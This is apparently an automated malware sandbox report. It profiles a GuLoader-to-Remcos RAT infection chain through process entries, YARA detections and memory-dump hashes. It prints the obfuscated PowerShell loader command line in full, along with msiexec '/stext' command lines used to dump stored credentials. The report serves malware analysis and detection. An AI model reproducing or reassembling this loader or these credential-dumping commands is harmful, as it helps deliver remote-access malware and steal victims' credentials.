EMelaWGo f-ExcaOKricB AfgJChloeC nscArcttLben OverSTn,eY FjasParfTC.ysE Cirmrema.Depr$AntiCSalaa onsrP rtICo dcmyrdAP ntt Vo,U GanRGimbeTank5Hirs8');Vedligeholdelsesvejledningerne148 ($Hunstiks);Vedligeholdelsesvejledningerne148 (Recheck 'Bnde$HoneU EmipudvapWashiRhestJubiy aignThaleCransGrapsTo c.N,niHModveFe laKontdE,eceUntirChems Mes[ a.l$SuffTSo.aeFiler DenrArbeeBorts OuttUnferSummi UndaC lolT.eti ubs HusmAl,o]Grye=Inde$VikaUDuchdInflh yhrnSprjgGingsStortMezea B.ng');$Strimmellser=Recheck 'Anko$SpreUAlumpTh.npDrapiSupetD mayPla,n Spie erasBilisBeta.PineDKjrso Se w,fginClo,lHereoD.kla Anid N nFSimoiT,phl Seme ask(Prot$UnchF OdioCatar J ne Attw UnsiHomonHu,hgovers Spo1V,lg3Exhi8Bes ,Avis$ P ts CaliPejenJenfdIgrabDiffiTredlHusmlmulteA red expeSelsrKa,dnGurseBugvsStav)';$sindbilledernes=$Melanthy;Vedligeholdelsesvejledningerne148 (Recheck 'Sp c$lyk GScalLr,aboBr.ab S iARickLEneb: .esOUncavE ecE NicRBegrp PaluShe B astL phaiReceCDo.m= Pla( ,estserieAfkaSWhizTSpec-UmleP C raDecaTexplh,jer Forl$HappsUncoi Sern.ypaDSoftBMiliiSautlA guLL moe A,tDA bnePerpRFastnLgtre anks Hul)');while (!$Overpublic) {Vedligeholdelsesvejledningerne148 (Recheck ' Saf$ anngSceplPnseo,letbCorta mpelD gl:Par RS,ksa datt esisahaobezen NoneZimmduds = dag$ utdp ndlRepraUnshgI miiEnsta RugrCanjiDattzSejpe dens') ;Vedligeholdelsesvejledningerne148 $Strimmellser;Vedligeholdelsesvejledningerne148 (Recheck ' C,msStu TSundAProsR mbet L m-EleksBragLbu lE T lEcoelPKbes Un o4');Vedligeholdelsesvejledningerne148 (Recheck 'Mole$ .ooGTun l mmeOHen.b IblANonrlunsh: FaloFeltVJetje ebr SkrpskoluImpubBanklpolyIGennCFist=rasp(PuncTRjseE anoSPlotTOper-S,depBnkeA BilTUdvihCaus Aftv$Jgers.uppiP laNin ed A rb D tiBl klYe,tlCur,eS ipdPolyeSlagRSkr nKoblEAfskSAlab)') ;Vedligeholdelsesvejledningerne148 (Recheck 'Sult$UnfrgT ndlUndeO.ncoBF ckAFosfLHema:Histn Ko oWhacNDattDFre,e ForC ColIPoi S SubITeksoVoluNTali=An.o$DelvGDigtlCrypOPneuBDa aa BoplSkol:Ca.mOpreeVDatoeNoncr GalsT toeEnthEUrogDCifrE BluDCa v+Spin+Padl%Trip$skrkAThe,F Na,b KilA FilLOpskaTowankulscFo lSGebynSnftr,all. Ls cUvanODegruAndrNForrT') ;$Forewings138=$Afbalancsnr[$Nondecision]}$Yverformer=279198;$Befordringsfradragene=31971;Vedligeholdelsesvejledningerne148 (Recheck 'Doll$H llgFo slUe.soAntibLeveAIcemlMart: UnhsBranP EnohJrenATylveAfr r ManOEnglsL vso AktMFoodeUtmm par= ut. s rG ArcEA owT D a-StniC,nluOVentNCordTStraE eawN LedTBeet Sara$KurssMut,iStepnScenD,locbStueiPharL r.fL KlaE.ongd Ob eStikr,remnGui,e nds');Vedligeholdelsesvejledningerne148 (Recheck 'Be,n$L.segBasilMe.eoSlamb Da aIatrlChl : B eAAggrt.ebet,nfrrTapeaEuphc Outt C eaSilkbT ielForbebal. Bril=sche depe[SpolSCummyBvresRo ptOv reSkr mInd .Ca,eC ox.o aspnSikkvm njeMiddrInddtEfte] Non:Min :T riFCordrTheroKoramSkarB D sa VolsAsc eCi,r6Unde4sideSKjrst DgnrDiagiVin.nI nigM.lm(Gyps$Tr,csEl cp OuthIncoaSarue TrarUnreoOversTireoalfam De eUnco)');Vedligeholdelsesvejledningerne148 (Recheck 'Outr$ kakg ErkL SoeO areb tedASkumL Acr:Luksc el.ODottlLovlOSpo,T ParoSystMKalmy age T ta=Ensi Poki[Creds dfy RetsLys tovareSelemInpu.StryTFriheliquXImprTG,at. SetESandnud.lc MedOGldeD,tevIcofoNQuotgSham] Irr: Fd :TaloaZ ofS,ovecThu,ITreaI Ket.PenigEft EKloktSh rSUnmitVlteRIntuIFo pnLut gBruj(Subp$Gu nAWedgt DisT Pl rOutfaEmpaCVindTValiaSol.bSudalGonaehaab)');Vedligeholdelsesvejledningerne148 (Recheck 'Co,f$ BomGAmbrL,ikvOAng bStanaAu oL Ol,:Un.aUForfDFuglbAw,klPalasGartEvarmRAuto=Band$FritcMa so BorlOst oB rgTGruno egem Un YVrks.HexasFiumuBewhBAndesOp etS,hlrLiegiJettNModeGUnta(He.d$UncoY Ex VK,viEJuggREftefPhotoverdRTrneM ButEPal,r C,n,Sk l$ vivBDiskeCib fcunnOnonarM.tzdinfaRTinsIDi,kn ilegHi asJo fFDecarGer AIndiD uglRMillA OveGHalveDiscn atEH,ve)');Vedligeholdelsesvejledningerne148 $Udblser;"
                                                                    Imagebase:0x220000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2426474677.0000000008790000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2401223856.0000000005AFB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2426676506.000000000CD89000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:04:43:10
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:7
                                                                    Start time:04:43:32
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                    Imagebase:0x220000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3317622787.0000000008009000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2558622157.0000000008020000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3317756831.0000000008027000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2616346771.0000000008026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3317622787.0000000008012000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2573780920.0000000008026000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3317622787.0000000007FFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.3313894054.0000000007599000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    Target ID:9
                                                                    Start time:04:43:53
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\lahohqpsrcskvvhwhdioicctkhlgz"
                                                                    Imagebase:0x220000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:04:43:53
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\vcmhhjaufkkpxkvaqovqlgwctnupsinbp"
                                                                    Imagebase:0x220000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:11
                                                                    Start time:04:43:53
                                                                    Start date:11/12/2024
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xwrzi"
                                                                    Imagebase:0x220000
                                                                    File size:59'904 bytes
                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Reset < >
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201364766.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af869acd361b997c679a93719e4c9663c100b82e70bae2e10253df80683644dc
                                                                      • Instruction ID: b44f26da019da5467a16615c3da68e71f4468659264e4ccb753c138ffbd3aa7f
                                                                      • Opcode Fuzzy Hash: af869acd361b997c679a93719e4c9663c100b82e70bae2e10253df80683644dc
                                                                      • Instruction Fuzzy Hash: 80F1B13090CA8E8FEBA8EF28C8557E977D1FF94350F44426ED84DC7295DB78A8458B81
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201364766.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af7d59ec29454b212f370c6a2ce9b4a53939d3bcb6a679a7465a04a358686a55
                                                                      • Instruction ID: e7562f81be11814158a232d06bed75dd4647ba1ce2f07fcbf47786cf0daa7f89
                                                                      • Opcode Fuzzy Hash: af7d59ec29454b212f370c6a2ce9b4a53939d3bcb6a679a7465a04a358686a55
                                                                      • Instruction Fuzzy Hash: 0BE17F3090CA4D8FEBA8EF28C8557F937E1FF54351F44426AE80EC7291DB3499858B86
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: K
                                                                      • API String ID: 0-856455061
                                                                      • Opcode ID: cc315806675c3c495b3081e125fd557b52abf585083337c0c8cc589bfb33b5d1
                                                                      • Instruction ID: 7df13da2d89785391070117186cf96c00fd7eef8c3d70548646ccd19a8a0a735
                                                                      • Opcode Fuzzy Hash: cc315806675c3c495b3081e125fd557b52abf585083337c0c8cc589bfb33b5d1
                                                                      • Instruction Fuzzy Hash: 59123871D1EBD61FE39AA73818651B4BBE1EFA6690F0901FED049C70D3DF18580A835A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cdf8634bd709070ffade03f2a119c6bdff9984898821af57effd7cce7adecbdc
                                                                      • Instruction ID: f0904ca9f3fe9b5f831ab884a987300cc9be15a7be88c2127daa0486f33d044f
                                                                      • Opcode Fuzzy Hash: cdf8634bd709070ffade03f2a119c6bdff9984898821af57effd7cce7adecbdc
                                                                      • Instruction Fuzzy Hash: F8422531A0EBC55FE79BA73868656B4BBE1EF46260F0801FBC04DC75D3DA199806C396
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201364766.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 76f3d0f380dc8656ebfd3d77edb67a4b438994647b04f8e14623f73010821139
                                                                      • Instruction ID: a75aa5b221792bdbac03ba9a5b7ef32eab50af3670e823252c2f073277aee53f
                                                                      • Opcode Fuzzy Hash: 76f3d0f380dc8656ebfd3d77edb67a4b438994647b04f8e14623f73010821139
                                                                      • Instruction Fuzzy Hash: A6227F30A1CA4D8FDF88EF58C495AADB7E2FFA8350F544169D409D7296CB35E881CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5facc67d3cf49b07714e9faa5cc4101ddf010e53efb8c929805046b68f2c6083
                                                                      • Instruction ID: 46fffdc61a72d3c93c7e24a921d0d277eb7c3c67c033033c94eaf001748845c0
                                                                      • Opcode Fuzzy Hash: 5facc67d3cf49b07714e9faa5cc4101ddf010e53efb8c929805046b68f2c6083
                                                                      • Instruction Fuzzy Hash: 63D13331E0EAC94FE79AEB285855674BBE1EF56350F0800FBC049CB1D3DA19AC96C356
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3840ee560eb60de09e9c5b0410ea21df714ddda1fdc7a06a4b32ff2de8a6311
                                                                      • Instruction ID: 8db207ddff12f7aaf0c224ac853ba84966beaefdcd50feeab68eb6b394c1bd83
                                                                      • Opcode Fuzzy Hash: d3840ee560eb60de09e9c5b0410ea21df714ddda1fdc7a06a4b32ff2de8a6311
                                                                      • Instruction Fuzzy Hash: BCB11831B0DB890FE75BAB2868555B4BBE1EF56250F0801FBD04DC79D3EA19AC06C395
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7d999ecee664a26e0b0c5c9f52e15f9776a6a565df646c0d33ecbdc70783be75
                                                                      • Instruction ID: 0377cb9f7aee9b266e7f261a96bad5b23455587751decc04595dc6603a7ea2fa
                                                                      • Opcode Fuzzy Hash: 7d999ecee664a26e0b0c5c9f52e15f9776a6a565df646c0d33ecbdc70783be75
                                                                      • Instruction Fuzzy Hash: 40A14531E1EA9A4FEB99EB2C58545B8BBE1EF597A0F1801BAD00DC71D3DE18AC05C345
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201364766.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 461229d924a024631903cdc7148a2d951a62a1e66b485d8f7a99f73f14e10cf7
                                                                      • Instruction ID: 8d206758c80acba8f24b6f1e2cf2493e110b1bb055d8ef52c9d955d86b2b0baf
                                                                      • Opcode Fuzzy Hash: 461229d924a024631903cdc7148a2d951a62a1e66b485d8f7a99f73f14e10cf7
                                                                      • Instruction Fuzzy Hash: 2DB1C43090CA8D8FEB69EF28C8557E93BD1FF55350F44426AE84DC7292CB34A8458B86
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72879630171b6d206947e8ccf56e5a4d395acb03b7cd98fd32eb479f6ff8e6d7
                                                                      • Instruction ID: 58e49cc408bb839dd5a18cff4e945326a251716dd635122dd3e80c97dfda0487
                                                                      • Opcode Fuzzy Hash: 72879630171b6d206947e8ccf56e5a4d395acb03b7cd98fd32eb479f6ff8e6d7
                                                                      • Instruction Fuzzy Hash: D441E632E1EA964FE799A76C18115B8B6E1EF497A1F5805BAD019C31D3DF0CB8048359
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 06e99c5985d36dcf53b755ddc46daa79044582dfeddfb08dacb88f5d49c7f63c
                                                                      • Instruction ID: a7d0b1bc1fd03d3d31b8ab10266ebeaddbdd4cfcdcb8d59ccec1db32fd498cbb
                                                                      • Opcode Fuzzy Hash: 06e99c5985d36dcf53b755ddc46daa79044582dfeddfb08dacb88f5d49c7f63c
                                                                      • Instruction Fuzzy Hash: 84419D21A0EBC55FE79BA7285865664BFF1EF16250F0901FAC088CB5D3DA095C4AC366
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0799577cd3d46fda2c1df5fbe2e425306c0c3504b54438aa49968a02e3729602
                                                                      • Instruction ID: ec5b1562a92c641b41e301f1f364accc9ed06b19f72c78d754045132e16f0d37
                                                                      • Opcode Fuzzy Hash: 0799577cd3d46fda2c1df5fbe2e425306c0c3504b54438aa49968a02e3729602
                                                                      • Instruction Fuzzy Hash: 07313972E0DFA64FF3A9A73C18061B4B6D1EF952A1F5801BAD10DC31C3DF18E8058259
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 296187bafda2c8314e172a819bc00aa87157f1d962bab173b101db809b36c0ff
                                                                      • Instruction ID: 01d785ee1963a001a2a3e87539c77e042ca0b7471de5d492f69adf8ca535016c
                                                                      • Opcode Fuzzy Hash: 296187bafda2c8314e172a819bc00aa87157f1d962bab173b101db809b36c0ff
                                                                      • Instruction Fuzzy Hash: 2731C232E1DB858FE759E728A8422FCF7A1EF96260F1801FBC049C3093EB14A8558795
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 29595e681f1e348b5b7b3473270d1addae7c32e4a2fa1e312de1d857d624d066
                                                                      • Instruction ID: 3ad8e7df1bba54f8b56f2563ddb789d6a4373705413b393fbe95919c5d8296bb
                                                                      • Opcode Fuzzy Hash: 29595e681f1e348b5b7b3473270d1addae7c32e4a2fa1e312de1d857d624d066
                                                                      • Instruction Fuzzy Hash: 3031B232F0EB855FE759A72C68522FCB7A2EF86261F0401BBD049C3193EF18A8558795
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a087ccbdefc434f597063a80b3a00b00634f4c694974280a37a1708573596fa
                                                                      • Instruction ID: 13b8d54f5c9aeebfdd3d289d0b8d25178000a0d1fd6b046aed8f028084cc1bac
                                                                      • Opcode Fuzzy Hash: 4a087ccbdefc434f597063a80b3a00b00634f4c694974280a37a1708573596fa
                                                                      • Instruction Fuzzy Hash: E0310032E0DA8A8FEBA5EB2894406B9B7E1EF65711B0401FAC109C71D7DB18E8558385
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201364766.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b8541edd89747ab30a86d7f51d34e31be3543ec88e1a28987451982e501a3eaf
                                                                      • Instruction ID: e8399595790e8b280eba2b33b896415087ba0e098c0e0472242c195c4f7c5d33
                                                                      • Opcode Fuzzy Hash: b8541edd89747ab30a86d7f51d34e31be3543ec88e1a28987451982e501a3eaf
                                                                      • Instruction Fuzzy Hash: 1631183081D68ECEFBB4AF24CC1ABF93290FF82358F801139D45D96092CB796985CB55
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9caf9e6a5b032b901618cac4c07b865fa2d6d7b4899dd2a81b95ae8ed09302bf
                                                                      • Instruction ID: dde470c91095e8fa614d445b891854b8abf3578af12aeabf7a6109ec9e4b9cb0
                                                                      • Opcode Fuzzy Hash: 9caf9e6a5b032b901618cac4c07b865fa2d6d7b4899dd2a81b95ae8ed09302bf
                                                                      • Instruction Fuzzy Hash: 8021D632B0DA498FDBA5EB2CA4456F9B7E1EF55611B0401BBC109C31D3DF14E845C791
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 19f70a2cfa66d739cc506676a8066b5422819dec7757cabda545068b204c504c
                                                                      • Instruction ID: 1fabf22e246da36e2b72effae3deb0dff52e4e5bca05a41aa00a037f200faa1a
                                                                      • Opcode Fuzzy Hash: 19f70a2cfa66d739cc506676a8066b5422819dec7757cabda545068b204c504c
                                                                      • Instruction Fuzzy Hash: 2811E432B1CE084EE759A72CA4051F9B3E1EF89631F4851BBC14EC3197EE15EC168295
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4612bf0731d31742df5274db3e00dac631a7ed9271352fbcfba91b70f703013d
                                                                      • Instruction ID: f5342b289d236f91d959447b862066daab756ff597058d72c39127a68faf5f3b
                                                                      • Opcode Fuzzy Hash: 4612bf0731d31742df5274db3e00dac631a7ed9271352fbcfba91b70f703013d
                                                                      • Instruction Fuzzy Hash: EF210422E0EAC15FF799A33818151746AE0EF56694F0900FAC048CB1D3ED0C6C88832A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201789217.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848f50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a9b4453b7e1bcafc2be5edd402400bc4b1d720dda1632b4648bb6b8ff34972c
                                                                      • Instruction ID: f00386369964b6089972b16daabbfe76efb44ffa0b6dca3c4c6d159d289eeb97
                                                                      • Opcode Fuzzy Hash: 5a9b4453b7e1bcafc2be5edd402400bc4b1d720dda1632b4648bb6b8ff34972c
                                                                      • Instruction Fuzzy Hash: 5C119132E0E7854FEB5AA72868511ACBBB2FF46660F0401FAD089931C3DB286D558756
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2201364766.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                      • Instruction ID: fbd3b9e7071c40a77c15b56bc6ded56dca8f6be253a73c72c42cd1986e3f836f
                                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                      • Instruction Fuzzy Hash: 7A01A73010CB0C4FDB44EF0CE051AAAB3E0FB85360F10052DE58AC3651D732E881CB45
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \V7m
                                                                      • API String ID: 0-1806336213
                                                                      • Opcode ID: 1d332c565586647f2a8cfddcc29359841ef97f97ad5fbf3350283b21dde342ea
                                                                      • Instruction ID: e43f7d193952115fb6c37f5bb78265d4ec84e336b250498a17ecb1ee80c223e4
                                                                      • Opcode Fuzzy Hash: 1d332c565586647f2a8cfddcc29359841ef97f97ad5fbf3350283b21dde342ea
                                                                      • Instruction Fuzzy Hash: 12B13E70E00219DFDB14CFA9C9857BDBBF2BF88324F148529D815A7394EB74A845CB85
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.2375162143.0000000004740000.00000040.00000800.00020000.00000000.sdmp, Offset: 04740000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_4740000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
